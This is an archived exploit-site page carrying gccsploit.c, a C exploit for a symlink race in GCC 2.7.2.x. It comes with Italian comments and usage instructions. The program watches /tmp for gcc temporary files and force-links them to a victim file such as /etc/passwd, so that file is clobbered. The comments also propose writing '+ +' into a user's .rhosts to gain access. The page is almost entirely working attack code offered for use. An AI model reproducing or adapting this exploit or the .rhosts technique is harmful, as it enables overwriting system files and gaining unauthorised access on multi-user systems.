what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

gccsploit.c

gccsploit.c
Posted Jan 10, 2000
Authored by s0ftpj, Pigpen

Gcc 2.7.2.x Exploit - C version.

SHA-256 | 867a0fdc26a013485e3d1f9f158a953de2b5612c8ef8f16856d92774668eb453

gccsploit.c

Change Mirror Download
/*
GCC 2.7.2.x exploit

Crea un link su un file temporaneo di gcc con destinazione -> victim_file
Il programma aspetta dei file tmp di gcc... e poi fa il link.

Uso: ./a.out /etc/passwd &

Spero che questa roba che ho scritto funga... il prog funziona cosi':
una volta eseguito per restare in background... cerca nella directory
/tmp dei file temporanei di gcc e grazie ad un bug (in pratica questi file
temporanei seguono il link simbolico) potete far vostro un file che non lo
e'...
Questo programma potrebbe essere scritto in modo piu' proficuo per esempio
leggendo attraverso una struttura di tipo "stat" l'uid del file temporaneo
e facendo quindi un link su .rhosts della home dell'utente con quell'id
e poi scrivendoci sopra un "+ +".
Sinceramente anche se e' abbastanza facile farlo non ho coglioni di scrivere
una cosa del genere visto che attualmente lavoro con una versione del gcc
gia' patchata :)
Questo programma puo' essere ottimizzato per esempio per essere reso piu'
veloce e per far si'che dopo un ciclo non vada a rifare i link su link
gia' creati prima...
Purtroppo capisco perche' Michal Zalewsky non abbia scritto una versione in
C di tale exploit... fare uno script bash di questo tipo non richiede
praticamente niente rispetto al programma...
Anch'io come pigrizia non scherzo... im sorry :) pIGpEN

*/

#include <unistd.h>
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/time.h>
#include <sys/resource.h>

#define EXPLOIT_NAME "gcc 2.7.2.X exploit"
#define ERROR -1
#define GCC_FILE "caa"
/* questa costante potrebbe causare problemi a file su /tmp che cominciano per
caa... ma sinceramente oggi sono troppo scazzato per cercare una soluzione a
tutti i problemi della vita :) */

main(int argc, char *argv[])
{
FILE *fp;
struct dirent **filelist;
char cmd[100];
int c_ret;

if(argc!=2)
{
system("clear");
printf("%s \nWritten by pIGpEN/s0ftpj\n",EXPLOIT_NAME);
printf("Exploit by Michal Zalewsky\n");
printf("Usage: %s victim_file\n",argv[0]);
exit(ERROR);
}

if((fp=fopen(argv[1],"r"))==NULL) // va bene anche l'access() con mode F_OK
{
printf("Victim File Not Found\n");
exit(ERROR);
}

else fclose(fp);

setpriority(PRIO_PGRP,0,20);
for(;;)
{
c_ret = scandir("/tmp", &filelist, 0, alphasort);
while(c_ret--)
{
if(strstr(filelist[c_ret]->d_name,GCC_FILE)!=NULL)
{
sprintf(cmd,"ln -sf %s /tmp/%s",argv[1],filelist[c_ret]->d_name);
system(cmd);
}
}
}
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close